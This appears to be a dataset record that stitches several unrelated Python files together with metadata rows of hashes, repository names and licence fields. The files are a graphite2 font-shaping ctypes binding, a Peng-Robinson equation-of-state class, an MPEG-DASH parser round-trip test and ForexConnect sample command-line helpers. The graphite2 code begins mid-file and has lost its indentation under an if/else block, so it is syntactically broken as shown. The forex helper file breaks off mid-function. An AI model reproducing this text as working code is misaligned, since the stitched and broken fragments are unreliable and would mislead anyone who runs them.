class FaceInfo(Structure) :
    """ctypes mirror of the C struct returned by ``gr_face_info`` (u16 fields)."""
    _fields_ = [
        ("extra_ascent", c_ushort),
        ("extra_descent", c_ushort),
        ("upem", c_ushort),
    ]
tablefn = CFUNCTYPE(c_void_p, c_void_p, c_uint, POINTER(c_size_t))
advfn = CFUNCTYPE(c_float, c_void_p, c_ushort)
fn('gr_engine_version', None, POINTER(c_int), POINTER(c_int), POINTER(c_int))
fn('gr_make_face', c_void_p, c_void_p, tablefn, c_uint)
fn('gr_str_to_tag', c_uint32, c_char_p)
fn('gr_tag_to_str', None, c_uint32, POINTER(c_char))
fn('gr_face_featureval_for_lang', c_void_p, c_void_p, c_uint32)
fn('gr_face_find_fref', c_void_p, c_void_p, c_uint32)
fn('gr_face_n_fref', c_uint16, c_void_p)
fn('gr_face_fref', c_void_p, c_void_p, c_uint16)
fn('gr_face_n_languages', c_ushort, c_void_p)
fn('gr_face_lang_by_index', c_uint32, c_void_p, c_uint16)
fn('gr_face_destroy', None, c_void_p)
fn('gr_face_n_glyphs', c_ushort, c_void_p)
fn('gr_face_info', POINTER(FaceInfo), c_void_p)
fn('gr_face_is_char_supported', c_int, c_void_p, c_uint32, c_uint32)
fn('gr_make_file_face', c_void_p, c_char_p, c_uint)
fn('gr_make_font', c_void_p, c_float, c_void_p)
fn('gr_make_font_with_advance_fn', c_void_p, c_float, c_void_p, advfn, c_void_p)
fn('gr_font_destroy', None, c_void_p)
fn('gr_fref_feature_value', c_uint16, c_void_p, c_void_p)
fn('gr_fref_set_feature_value', c_int, c_void_p, c_uint16, c_void_p)
fn('gr_fref_id', c_uint32, c_void_p)
fn('gr_fref_n_values', c_uint16, c_void_p)
fn('gr_fref_value', c_int16, c_void_p, c_uint16)
fn('gr_fref_label', c_void_p, c_void_p, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_fref_value_label', c_void_p, c_void_p, c_uint16, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_label_destroy', None, c_void_p)
fn('gr_featureval_clone', c_void_p, c_void_p)
fn('gr_featureval_destroy', None, c_void_p)
fn('gr_cinfo_unicode_char', c_uint, c_void_p)
fn('gr_cinfo_break_weight', c_int, c_void_p)
fn('gr_cinfo_after', c_int, c_void_p)
fn('gr_cinfo_before', c_int, c_void_p)
fn('gr_cinfo_base', c_size_t, c_void_p)
fn('gr_count_unicode_characters', c_size_t, c_int, c_void_p, c_void_p, POINTER(c_void_p))
fn('gr_make_seg', c_void_p, c_void_p, c_void_p, c_uint32, c_void_p, c_int, c_void_p, c_size_t, c_int)
fn('gr_seg_destroy', None, c_void_p)
fn('gr_seg_advance_X', c_float, c_void_p)
fn('gr_seg_advance_Y', c_float, c_void_p)
fn('gr_seg_n_cinfo', c_uint, c_void_p)
fn('gr_seg_cinfo', c_void_p, c_void_p, c_uint)
fn('gr_seg_n_slots', c_uint, c_void_p)
fn('gr_seg_first_slot', c_void_p, c_void_p)
fn('gr_seg_last_slot', c_void_p, c_void_p)
fn('gr_seg_justify', c_float, c_void_p, c_void_p, c_void_p, c_double, c_int, c_void_p, c_void_p)
fn('gr_slot_next_in_segment', c_void_p, c_void_p)
fn('gr_slot_prev_in_segment', c_void_p, c_void_p)
fn('gr_slot_attached_to', c_void_p, c_void_p)
fn('gr_slot_first_attachment', c_void_p, c_void_p)
fn('gr_slot_next_sibling_attachment', c_void_p, c_void_p)
fn('gr_slot_gid', c_ushort, c_void_p)
fn('gr_slot_origin_X', c_float, c_void_p)
fn('gr_slot_origin_Y', c_float, c_void_p)
fn('gr_slot_advance_X', c_float, c_void_p)
fn('gr_slot_advance_Y', c_float, c_void_p)
fn('gr_slot_before', c_int, c_void_p)
fn('gr_slot_after', c_int, c_void_p)
fn('gr_slot_index', c_uint, c_void_p)
fn('gr_slot_attr', c_int, c_void_p, c_void_p, c_int, c_uint8)
fn('gr_slot_can_insert_before', c_int, c_void_p)
fn('gr_slot_original', c_int, c_void_p)
fn('gr_slot_linebreak_before', None, c_void_p)
(major, minor, debug) = grversion()
if major > 1 or minor > 1 :
fn('gr_start_logging', c_int, c_void_p, c_char_p)
fn('gr_stop_logging', None, c_void_p)
else :
fn('graphite_start_logging', c_int, c_void_p, c_int)
fn('graphite_stop_logging', None)
def tag_to_str(num) :
    """Convert a 32-bit graphite2 tag *num* into its 4-character string form."""
    # Fix: create_string_buffer must be given a size (or bytes) on Python 3;
    # the previous '\000' * 5 str argument raised TypeError there.
    s = create_string_buffer(5)
    gr2.gr_tag_to_str(num, s)
    # s.value is bytes; decode so Python 3 does not return "b'...'"
    return str(s.value.decode('ascii'))
class Label(unicode) :
    """A string subclass that owns a graphite2 label allocation.

    The C buffer ``ref`` is released with ``gr_label_destroy`` when the
    Python object is garbage collected.
    """
    def __new__(typename, ref, size) :
        # build the string content from the C buffer before __init__ runs
        return super(Label, typename).__new__(typename, string_at(ref, size))
    def __init__(self, ref, size) :
        self.ref = ref
    def __del__(self, __gr2=gr2) :
        # the __gr2 default keeps the module reference alive during interpreter teardown
        if self.ref : __gr2.gr_label_destroy(self.ref)
class FeatureVal(object) :
    """Wrapper around a graphite2 feature-value map (owns its destruction)."""
    def __init__(self, fval) :
        self.fval = fval
    def __del__(self, __gr2=gr2) :
        # bound default keeps gr2 reachable during interpreter shutdown
        __gr2.gr_featureval_destroy(self.fval)
    def get(self, fref) :
        """Return the current value of feature *fref* in this map."""
        return gr2.gr_fref_feature_value(fref.fref, self.fval)
    def set(self, fref, val) :
        """Set feature *fref* to *val*; raise ValueError if the C call fails."""
        if not gr2.gr_fref_set_feature_value(fref.fref, val, self.fval) :
            # Fix: 'raise Error' referenced an undefined name and produced a
            # NameError instead of a meaningful exception.
            raise ValueError("unable to set feature value %r" % (val,))
class FeatureRef(object) :
    """Wrapper around a graphite2 feature reference (one configurable feature)."""
    def __init__(self, fref, index = 0) :
        self.fref = fref
        self.index = index
    def num(self) :
        """Return the number of possible values for this feature."""
        return gr2.gr_fref_n_values(self.fref)
    def val(self, ind) :
        """Return the feature value at index *ind*."""
        return gr2.gr_fref_value(self.fref, ind)
    def name(self, langid) :
        """Return the feature's label for language *langid* as a Label."""
        lngid = c_uint16(langid)
        length = c_uint32(0)
        res = gr2.gr_fref_label(self.fref, byref(lngid), 1, byref(length))
        return Label(res, length.value)
    def label(self, ind, langid) :
        """Return the label of value *ind* for language *langid* as a Label."""
        lngid = c_uint16(langid)
        length = c_uint32(0)
        res = gr2.gr_fref_value_label(self.fref, ind, byref(lngid), 1, byref(length))
        return Label(res, length.value)
    def tag(self) :
        """Return the feature's 4-character tag string."""
        return tag_to_str(gr2.gr_fref_id(self.fref))
class Face(object) :
    """A graphite2 font face loaded from a file path or via a table callback."""
    def __init__(self, data, options = 0, fn=None) :
        data = data.encode('utf8')
        if fn :
            self.face = gr2.gr_make_face(data, fn, options)
        else :
            self.face = gr2.gr_make_file_face(data, options)
    def __del__(self, __gr2=gr2) :
        # bound default keeps gr2 reachable during interpreter shutdown
        __gr2.gr_face_destroy(self.face)
    def get_upem(self) :
        """Return the face's units-per-em."""
        finfo = gr2.gr_face_info(self.face)
        return finfo.contents.upem
    def num_glyphs(self) :
        """Return the number of glyphs in the face."""
        # Fix: previously called the misspelt gr2.fr_face_n_glyphs (AttributeError)
        return gr2.gr_face_n_glyphs(self.face)
    def get_featureval(self, lang) :
        """Return the default FeatureVal for *lang* (bytes tag or numeric tag)."""
        if isinstance(lang, bytes) :
            # Fix: gr_str_to_tag must be called on the gr2 library (was a bare NameError)
            lang = gr2.gr_str_to_tag(lang)
        return FeatureVal(gr2.gr_face_featureval_for_lang(self.face, lang))
    def get_featureref(self, featid) :
        """Return the FeatureRef for feature *featid* (bytes tag or numeric tag)."""
        if isinstance(featid, bytes) :
            # Fix: same undefined-name bug as in get_featureval
            featid = gr2.gr_str_to_tag(featid)
        return FeatureRef(gr2.gr_face_find_fref(self.face, featid))
    @property
    def featureRefs(self) :
        """Iterate over all FeatureRef objects of the face."""
        num = gr2.gr_face_n_fref(self.face)
        for i in range(num) :
            yield FeatureRef(gr2.gr_face_fref(self.face, i), index = i)
    @property
    def featureLangs(self) :
        """Iterate over the language tags supported by the face."""
        num = gr2.gr_face_n_languages(self.face)
        for i in range(num) :
            yield gr2.gr_face_lang_by_index(self.face, i)
class Font(object) :
    """A graphite2 font: a face scaled to a given pixels-per-em size."""
    def __init__(self, face, ppm, fn=None, data=None) :
        if not fn :
            self.font = gr2.gr_make_font(ppm, face.face)
        else :
            # custom advance callback variant
            self.font = gr2.gr_make_font_with_advance_fn(ppm, data, fn, face.face)
    def __del__(self, __gr2=gr2) :
        # bound default keeps gr2 reachable during interpreter shutdown
        __gr2.gr_font_destroy(self.font)
class CInfo(object) :
    """Read-only view of one character's info record inside a Segment."""
    def __init__(self, pcinfo) :
        self.cinfo = pcinfo
    @property
    def unicode(self) :
        """Unicode code point of the character."""
        return gr2.gr_cinfo_unicode_char(self.cinfo)
    @property
    def breakweight(self) :
        """Line-break weight reported by graphite2."""
        return gr2.gr_cinfo_break_weight(self.cinfo)
    @property
    def after(self) :
        """Slot index after this character."""
        return gr2.gr_cinfo_after(self.cinfo)
    @property
    def before(self) :
        """Slot index before this character."""
        return gr2.gr_cinfo_before(self.cinfo)
    @property
    def base(self) :
        """Byte offset of the character in the original input string."""
        return gr2.gr_cinfo_base(self.cinfo)
class Slot(object) :
    """Wrapper around one positioned glyph (slot) of a Segment."""
    def __init__(self, s) :
        self.slot = s
    def attached_to(self) :
        """Return the parent slot this slot is attached to."""
        return Slot(gr2.gr_slot_attached_to(self.slot))
    def children(self) :
        """Iterate over the slots attached to this one."""
        s = gr2.gr_slot_first_attachment(self.slot)
        while s :
            yield Slot(s)
            s = gr2.gr_slot_next_sibling_attachment(s)
    @property
    def index(self) :
        """Position of this slot within its segment."""
        # Fix: an identical duplicate 'index' property further down shadowed
        # this one; the duplicate definition has been removed.
        return gr2.gr_slot_index(self.slot)
    @property
    def gid(self) :
        """Glyph id of the slot."""
        return gr2.gr_slot_gid(self.slot)
    @property
    def origin(self) :
        """(x, y) origin of the glyph."""
        return (gr2.gr_slot_origin_X(self.slot), gr2.gr_slot_origin_Y(self.slot))
    @property
    def advance(self) :
        """(x, y) advance of the glyph."""
        return (gr2.gr_slot_advance_X(self.slot), gr2.gr_slot_advance_Y(self.slot))
    @property
    def before(self) :
        return gr2.gr_slot_before(self.slot)
    @property
    def after(self) :
        return gr2.gr_slot_after(self.slot)
    @property
    def insert_before(self) :
        return gr2.gr_slot_can_insert_before(self.slot)
    @property
    def original(self) :
        return gr2.gr_slot_original(self.slot)
    @property
    def linebreak(self) :
        # side-effecting C call; the property itself returns None
        gr2.gr_slot_linebreak_before(self.slot)
    def gettattr(self, seg, ind, subindex) :
        # NOTE: the name 'gettattr' (sic) is kept for backward compatibility
        return gr2.gr_slot_attr(self.slot, seg.seg, ind, subindex)
class Segment(object) :
    """A shaped run of text: positioned glyphs (slots) plus character info."""
    def __init__(self, font, face, scriptid, string, rtl, length = None, feats = None) :
        if not length :
            length = len(string)
        if isinstance(scriptid, bytes) :
            scriptid = gr2.gr_str_to_tag(scriptid)
        self.seg = gr2.gr_make_seg(font.font if font is not None else 0, face.face, scriptid, (feats.fval if feats else 0), 1, string.encode('utf_8'), length, rtl)
    def __del__(self, __gr2=gr2) :
        # bound default keeps gr2 reachable during interpreter shutdown
        __gr2.gr_seg_destroy(self.seg)
    @property
    def advance(self) :
        """(x, y) advance of the whole segment."""
        return (gr2.gr_seg_advance_X(self.seg), gr2.gr_seg_advance_Y(self.seg))
    @property
    def num_cinfo(self) :
        """Number of character info records."""
        return gr2.gr_seg_n_cinfo(self.seg)
    def cinfo(self, ind) :
        """Return the CInfo record for character index *ind*."""
        return CInfo(gr2.gr_seg_cinfo(self.seg, ind))
    @property
    def num_slots(self) :
        """Number of slots (glyphs) in the segment."""
        return gr2.gr_seg_n_slots(self.seg)
    @property
    def slots(self) :
        """All slots in logical order."""
        s = gr2.gr_seg_first_slot(self.seg)
        res = []
        while s :
            res.append(Slot(s))
            s = gr2.gr_slot_next_in_segment(s)
        return res
    @property
    def revslots(self) :
        """All slots in reverse logical order."""
        s = gr2.gr_seg_last_slot(self.seg)
        res = []
        while s :
            res.append(Slot(s))
            s = gr2.gr_slot_prev_in_segment(s)
        return res
    def justify(self, start, font, width, flags, first = None, last = None) :
        """Justify the segment to *width* starting at slot *start*.

        Fix: the method was missing its ``self`` parameter, so the body's
        ``self.seg`` raised NameError on every invocation.
        """
        gr2.gr_seg_justify(self.seg, start.slot, font.font, width, flags, first.slot if first else 0, last.slot if last else 0)
| 4,853 | 1,444 | 677 |
9de4506c0dcebe59faf722b9fbf0a45256f07f38 | 3,765 | py | Python | pvtpy/eos/peng_robinson.py | scuervo91/pvtpy | 6fe42caee6a193e7a406b3461a397dada3c32445 | [
"MIT"
] | null | null | null | pvtpy/eos/peng_robinson.py | scuervo91/pvtpy | 6fe42caee6a193e7a406b3461a397dada3c32445 | [
"MIT"
] | null | null | null | pvtpy/eos/peng_robinson.py | scuervo91/pvtpy | 6fe42caee6a193e7a406b3461a397dada3c32445 | [
"MIT"
] | null | null | null | from pydantic import BaseModel, Field
import numpy as np
from ..units import Pressure, Temperature, CriticalProperties
| 35.518868 | 128 | 0.588845 | from pydantic import BaseModel, Field
import numpy as np
from ..units import Pressure, Temperature, CriticalProperties
class PengRobinson(BaseModel):
    """Peng-Robinson cubic equation of state.

    Works in field units: pressure in psi, temperature in Rankine,
    R = 10.73 (psi*ft3)/(lb-mol*R) by default.
    """
    a: float = Field(None)        # attraction parameter
    b: float = Field(None)        # co-volume parameter
    alpha: float = Field(None)    # temperature-dependence correction alpha(T)
    a_alpha: float = Field(None)  # mixture a*alpha (set by mixture_coef_ab)
    def coef_ab(self,critical_properties:CriticalProperties, R = 10.73):
        """Compute and store pure-component constants a and b from critical properties."""
        pc = critical_properties.critical_pressure.convert_to('psi').value
        tc = critical_properties.critical_temperature.convert_to('rankine').value
        a = 0.45724 * ((np.square(R) * np.square(tc))/pc)
        b = 0.07780 * (R * tc) / pc
        self.a = a
        self.b = b
        return a, b
    def coef_m(self, acentric_factor:float):
        """Return the m coefficient; a higher-order correlation is used for omega > 0.49."""
        if acentric_factor > 0.49:
            return 0.379642 + 1.48503*acentric_factor - 0.1644*np.power(acentric_factor,2) + 0.01667*np.power(acentric_factor,3)
        return 0.3796 + 1.5422*acentric_factor - 0.2699*np.power(acentric_factor,2)
    def coef_alpha(self,t:Temperature,critical_properties:CriticalProperties,acentric_factor:float):
        """Compute and store alpha(T) = (1 + m*(1 - sqrt(Tr)))**2."""
        tc = critical_properties.critical_temperature.convert_to('rankine').value
        t = t.convert_to('rankine').value
        # reduced temperature
        tr = t/tc
        m = self.coef_m(acentric_factor)
        alpha = np.square(1 + m*(1-np.sqrt(tr)))
        self.alpha = alpha
        return alpha
    def coef_AB(self, p:Pressure, t:Temperature, R=10.73):
        """Return the dimensionless A and B coefficients at (p, t)."""
        pressure = p.convert_to('psi').value
        temperature = t.convert_to('rankine').value
        a = self.a
        b = self.b
        alpha= self.alpha
        # prefer the mixture a*alpha when mixture_coef_ab has been called
        a_alpha = self.a * self.alpha if self.a_alpha is None else self.a_alpha
        A = (a_alpha * pressure) / np.square(R*temperature)
        B = (b * pressure) / (R * temperature)
        return A, B
    def cubic_poly(self,p:Pressure, t:Temperature, R=10.73):
        """Return the PR compressibility-factor cubic as a numpy Polynomial
        (coefficients in ascending order)."""
        A, B = self.coef_AB(p, t, R=R)
        coef = [-(A*B-np.square(B)-np.power(B,3)), A-3*np.square(B)-2*B, B-1,1]
        return np.polynomial.Polynomial(coef)
    def mixture_coef_ab(self, mole_fraction, a, b, alpha, k=None):
        """Apply Peng-Robinson mixing rules; store and return (a_alpha, b) of the mixture.

        ``k`` is an optional matrix of binary interaction coefficients with the
        same shape as the component-pair matrix.
        """
        xx = np.matmul(mole_fraction.reshape(-1,1), mole_fraction.reshape(1,-1))
        aa = np.matmul(a.reshape(-1,1), a.reshape(1,-1))
        hh = np.matmul(alpha.reshape(-1,1), alpha.reshape(1,-1))
        if k is None:
            k = 0.
        elif k.shape != xx.shape:
            raise ValueError(f'k must be a scalar or have the same shape as xx {xx.shape}')
        # (a*alpha)_m = sum_i sum_j x_i x_j sqrt(a_i a_j alpha_i alpha_j) (1 - k_ij)
        # Fix: k was validated but never applied, so supplied binary interaction
        # coefficients were silently ignored (default k=None is unaffected).
        product = xx * np.sqrt(aa * hh) * (1.0 - k)
        a_alpha = product.sum().sum()
        bm = np.dot(mole_fraction,b)
        self.b = bm
        self.a_alpha = a_alpha
        return a_alpha, bm
    def estimate_densities(self, p:Pressure, t:Temperature, molecular_weight:float, R=10.73):
        """Solve the Z-factor cubic at (p, t) and convert roots to densities
        (units consistent with R and molecular_weight).

        Returns ``{'rho': ...}`` for a single real root, otherwise
        ``{'rho_gas': ..., 'rho_liquid': ...}`` where the largest positive
        root maps to the gas phase and the smallest to the liquid phase.
        """
        poly = self.cubic_poly(p, t, R=R)
        pressure = p.convert_to('psi').value
        temperature = t.convert_to('rankine').value
        roots = poly.roots()
        real_roots = np.isreal(roots)
        if real_roots.sum() == 1:
            root_z = roots[real_roots].real
            rho = (pressure*molecular_weight)/(root_z*R*temperature)
            return {'rho':rho}
        positive_roots = roots[roots > 0]
        gas_root = positive_roots.max()
        liquid_root = positive_roots.min()
        rho_gas = (pressure*molecular_weight)/(gas_root*R*temperature)
        rho_liquid = (pressure*molecular_weight)/(liquid_root*R*temperature)
        return {'rho_gas':rho_gas, 'rho_liquid':rho_liquid}
58dd7ca0dc1e5f7d4f6f08f327033b0d25f35645 | 2,139 | py | Python | tests/test_mpdtoxml.py | wreszelewski/python-mpegdash | a0f83810e479711f2f40dd8c44b5a903438a0dcc | [
"MIT"
] | 39 | 2019-10-12T13:41:01.000Z | 2022-03-30T19:58:45.000Z | tests/test_mpdtoxml.py | fox0618/python-mpegdash | 9cdcafd3395d99ad211ea1010eac7aef516ecae4 | [
"MIT"
] | 24 | 2019-09-22T08:56:27.000Z | 2022-03-05T01:21:19.000Z | tests/test_mpdtoxml.py | fox0618/python-mpegdash | 9cdcafd3395d99ad211ea1010eac7aef516ecae4 | [
"MIT"
] | 22 | 2019-10-14T12:24:21.000Z | 2022-03-03T18:50:30.000Z | try:
import unittest
except ImportError:
import unittest2 as unittest
from sys import version_info
from mpegdash.parser import MPEGDASHParser
| 36.254237 | 85 | 0.619916 | try:
import unittest
except ImportError:
import unittest2 as unittest
from sys import version_info
from mpegdash.parser import MPEGDASHParser
class MPD2XMLTestCase(unittest.TestCase):
    """Round-trip checks: parse an MPD, serialise it, and parse it again."""

    @staticmethod
    def _all_representations(mpd):
        # Flatten every representation of every adaptation set of every period.
        return [
            representation
            for period in mpd.periods
            for adaptation_set in period.adaptation_sets
            for representation in adaptation_set.representations
        ]

    def test_mpd2xml(self):
        """Writing a parsed MPD and re-parsing it preserves all representations."""
        mpd = MPEGDASHParser.parse('./tests/mpd-samples/sample-001.mpd')
        MPEGDASHParser.write(mpd, './tests/mpd-samples/output.mpd')
        mpd2 = MPEGDASHParser.parse('./tests/mpd-samples/output.mpd')

        all_reprs = self._all_representations(mpd)
        all_reprs2 = self._all_representations(mpd2)

        self.assertTrue(len(all_reprs) == 5)
        self.assertTrue(len(all_reprs) == len(all_reprs2))

    def test_mpd2xml_boolean_casing(self):
        """Boolean attributes must be serialised in lower case."""
        mpd = MPEGDASHParser.parse('./tests/mpd-samples/with_event_message_data.mpd')
        MPEGDASHParser.write(mpd, './tests/mpd-samples/output.mpd')

        with open('./tests/mpd-samples/output.mpd') as f:
            regex = r'segmentAlignment=\"true\"'
            contents = f.read()
            # assertRegexpMatches is deprecated in 3, assertRegex not in 2
            if version_info > (3, 1,):
                self.assertRegex(contents, regex)
            else:
                self.assertRegexpMatches(contents, regex)

    def test_mpd2xmlstr(self):
        """toprettyxml output must be stable under a parse/serialise cycle."""
        # set maxDiff to None for Python2.6
        self.maxDiff = None
        with open('./tests/mpd-samples/sample-001.mpd') as f:
            # read the test MPD
            mpd = MPEGDASHParser.parse(f.read())
        # get the MPD as an XML string, parse that string, serialise again,
        # and check that the two serialisations are identical
        xmlstrout = MPEGDASHParser.toprettyxml(mpd)
        mpd2 = MPEGDASHParser.parse(xmlstrout)
        xmlstrout2 = MPEGDASHParser.toprettyxml(mpd2)
        self.assertEqual(xmlstrout, xmlstrout2)
| 1,864 | 20 | 103 |
0bc05b0077b727e62fea7fe23cb0e20ab099fdea | 9,796 | py | Python | samples/Python/common_samples/common.py | holgafx/gehtsoft | 7bb1dfc23d3b5b45793a85e162bbed2ca963d3ed | [
"Apache-2.0"
] | null | null | null | samples/Python/common_samples/common.py | holgafx/gehtsoft | 7bb1dfc23d3b5b45793a85e162bbed2ca963d3ed | [
"Apache-2.0"
] | null | null | null | samples/Python/common_samples/common.py | holgafx/gehtsoft | 7bb1dfc23d3b5b45793a85e162bbed2ca963d3ed | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Gehtsoft USA LLC
# Licensed under the license derived from the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://fxcodebase.com/licenses/open-source/license.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import __main__
import datetime
import traceback
import argparse
import sys
from forexconnect import fxcorepy
logging.basicConfig(filename='{0}.log'.format(__main__.__file__), level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s', datefmt='%m.%d.%Y %H:%M:%S')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
# function for print available descriptors
| 44.527273 | 113 | 0.5441 | # Copyright 2018 Gehtsoft USA LLC
# Licensed under the license derived from the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://fxcodebase.com/licenses/open-source/license.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import __main__
import datetime
import traceback
import argparse
import sys
from forexconnect import fxcorepy
logging.basicConfig(filename='{0}.log'.format(__main__.__file__), level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s', datefmt='%m.%d.%Y %H:%M:%S')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
def add_main_arguments(parser: argparse.ArgumentParser):
    """Register the connection options that every sample needs.

    -l (login), -p (password), -u (host URL) and -c (connection name) are
    required; -session and -pin are optional.
    """
    parser.add_argument('-l',
                        metavar="LOGIN",
                        required=True,
                        help='Your user name.')
    parser.add_argument('-p',
                        metavar="PASSWORD",
                        required=True,
                        help='Your password.')
    parser.add_argument('-u',
                        metavar="URL",
                        required=True,
                        help='The server URL. For example,\
                        http://www.fxcorporate.com/Hosts.jsp.')
    parser.add_argument('-c',
                        metavar="CONNECTION",
                        required=True,
                        help='The connection name. For example, \
                        "Demo" or "Real".')
    parser.add_argument('-session',
                        help='The database name. Required only for users who\
                        have accounts in more than one database.\
                        Optional parameter.')
    parser.add_argument('-pin',
                        help='Your pin code. Required only for users who have \
                        a pin. Optional parameter.')
def add_candle_open_price_mode_argument(parser: argparse.ArgumentParser):
    """Register the optional -o candle-open-price-mode option
    (first_tick or prev_close; defaults to prev_close)."""
    parser.add_argument('-o',
                        metavar="CANDLE_OPEN_PRICE_MODE",
                        default="prev_close",
                        help='Ability to set the open price candles mode. \
                        Possible values are first_tick, prev_close. For more information see description \
                        of O2GCandleOpenPriceMode enumeration. Optional parameter.')
def add_instrument_timeframe_arguments(parser: argparse.ArgumentParser, timeframe: bool = True):
    """Register -i (instrument, default EUR/USD) and, when *timeframe* is
    True, -timeframe (candle period, default m1)."""
    parser.add_argument('-i',
                        metavar="INSTRUMENT",
                        default="EUR/USD",
                        help='An instrument which you want to use in sample. \
                        For example, "EUR/USD".')
    if timeframe:
        parser.add_argument('-timeframe',
                            metavar="TIMEFRAME",
                            default="m1",
                            help='Time period which forms a single candle. \
                            For example, m1 - for 1 minute, H1 - for 1 hour.')
def add_direction_rate_lots_arguments(parser: argparse.ArgumentParser, direction: bool = True, rate: bool = True,
                                      lots: bool = True):
    """Register the trade options -d (direction), -r (rate) and -lots on
    *parser*; each flag argument toggles whether its option is added."""
    optional_arguments = (
        (direction, '-d', dict(metavar="TYPE", required=True,
                               help='The order direction. Possible values are: B - buy, S - sell.')),
        (rate, '-r', dict(metavar="RATE", required=True, type=float,
                          help='Desired price of an entry order.')),
        (lots, '-lots', dict(metavar="LOTS", default=1, type=int,
                             help='Trade amount in lots.')),
    )
    for enabled, flag, options in optional_arguments:
        if enabled:
            parser.add_argument(flag, **options)
def add_account_arguments(parser: argparse.ArgumentParser):
    """Register the optional -account argument on *parser*."""
    account_options = {
        'metavar': "ACCOUNT",
        'help': 'An account which you want to use in sample.',
    }
    parser.add_argument('-account', **account_options)
def valid_datetime(check_future: bool):
    """Return an argparse type-checker that parses 'm.d.Y H:M:S' strings
    into timezone-aware UTC datetimes.

    When check_future is True, datetimes later than the current UTC time
    are rejected (used for 'from' dates that must lie in the past).
    Raises argparse.ArgumentTypeError on an invalid or future date.
    """
    def _valid_datetime(str_datetime: str):
        date_format = '%m.%d.%Y %H:%M:%S'
        try:
            result = datetime.datetime.strptime(str_datetime, date_format).replace(
                tzinfo=datetime.timezone.utc)
            # datetime.utcnow() is deprecated; now(timezone.utc) is the
            # equivalent aware current time.
            if check_future and result > datetime.datetime.now(datetime.timezone.utc):
                msg = "'{0}' is in the future".format(str_datetime)
                raise argparse.ArgumentTypeError(msg)
            return result
        except ValueError:
            now = datetime.datetime.now()
            msg = "The date '{0}' is invalid. The valid data format is '{1}'. Example: '{2}'".format(
                str_datetime, date_format, now.strftime(date_format))
            raise argparse.ArgumentTypeError(msg)
    return _valid_datetime
def add_date_arguments(parser: argparse.ArgumentParser, date_from: bool = True, date_to: bool = True):
    """Register -datefrom / -dateto history-range options; -datefrom must
    not lie in the future (valid_datetime(True)), -dateto may."""
    if date_from:
        parser.add_argument('-datefrom',
                            metavar="\"m.d.Y H:M:S\"",
                            help='Date/time from which you want to receive\
                            historical prices. If you leave this argument as it \
                            is, it will mean from last trading day. Format is \
                            "m.d.Y H:M:S". Optional parameter.',
                            type=valid_datetime(True)
                            )
    if date_to:
        parser.add_argument('-dateto',
                            metavar="\"m.d.Y H:M:S\"",
                            help='Datetime until which you want to receive \
                            historical prices. If you leave this argument as it is, \
                            it will mean to now. Format is "m.d.Y H:M:S". \
                            Optional parameter.',
                            type=valid_datetime(False)
                            )
def add_report_date_arguments(parser: argparse.ArgumentParser, date_from: bool = True, date_to: bool = True):
    """Register -datefrom / -dateto options for the combo account statement
    report.

    NOTE(review): unlike add_date_arguments, -dateto here also rejects
    future dates (valid_datetime(True)) — confirm this asymmetry is intended.
    """
    if date_from:
        parser.add_argument('-datefrom',
                            metavar="\"m.d.Y H:M:S\"",
                            help='Datetime from which you want to receive\
                            combo account statement report. If you leave this argument as it \
                            is, it will mean from last month. Format is \
                            "m.d.Y H:M:S". Optional parameter.',
                            type=valid_datetime(True)
                            )
    if date_to:
        parser.add_argument('-dateto',
                            metavar="\"m.d.Y H:M:S\"",
                            help='Datetime until which you want to receive \
                            combo account statement report. If you leave this argument as it is, \
                            it will mean to now. Format is "m.d.Y H:M:S". \
                            Optional parameter.',
                            type=valid_datetime(True)
                            )
def add_max_bars_arguments(parser: argparse.ArgumentParser):
    """Register -quotescount (maximum number of bars; 0 means unlimited)."""
    parser.add_argument(
        '-quotescount',
        type=int,
        default=0,
        metavar="MAX",
        help='Max number of bars. 0 - Not limited',
    )
def add_bars_arguments(parser: argparse.ArgumentParser):
    """Register -bars (number of bars to build; defaults to 3)."""
    parser.add_argument(
        '-bars',
        type=int,
        default=3,
        metavar="COUNT",
        help='Build COUNT bars. Optional parameter.',
    )
def print_exception(exception: Exception):
    """Log *exception* together with the current traceback at ERROR level."""
    details = traceback.format_exc()
    message = "Exception: {0}\n{1}".format(exception, details)
    logging.error(message)
# function for print available descriptors
def session_status_changed(session: fxcorepy.O2GSession,
                           status: fxcorepy.AO2GSessionStatus.O2GSessionStatus):
    """Session-status callback: log the new status and, when a trading
    session is requested, dump a table of the available session descriptors
    (id, name, description, whether a pin is required)."""
    logging.info("Status: " + str(status))
    if status == fxcorepy.AO2GSessionStatus.O2GSessionStatus.TRADING_SESSION_REQUESTED:
        descriptors = session.trading_session_descriptors
        logging.info("Session descriptors:")
        logging.info(" {0:>7} | {1:>7} | {2:>30} | {3:>7}\n".format("id", "name", "description", "requires pin"))
        for desc in descriptors:
            logging.info(" {0:>7} | {1:>7} | {2:>30} | {3:>7}\n".format(desc.id, desc.name,
                                                                        desc.description,
                                                                        str(desc.requires_pin)))
def diff_month(year: int, month: int, date2: datetime):
    """Return the number of whole months from *date2* up to (year, month)."""
    months_between_years = (year - date2.year) * 12
    return months_between_years + (month - date2.month)
def convert_timeframe_to_seconds(unit: fxcorepy.O2GTimeFrameUnit, size: int):
    """Convert a timeframe (unit, size) into a number of seconds.

    A month is approximated as 30 days; TICK (and any unrecognised unit)
    uses a step of one second.
    """
    minute = 60
    hour = 60 * minute
    day = 24 * hour
    if unit == fxcorepy.O2GTimeFrameUnit.MIN:
        step = minute
    elif unit == fxcorepy.O2GTimeFrameUnit.HOUR:
        step = hour
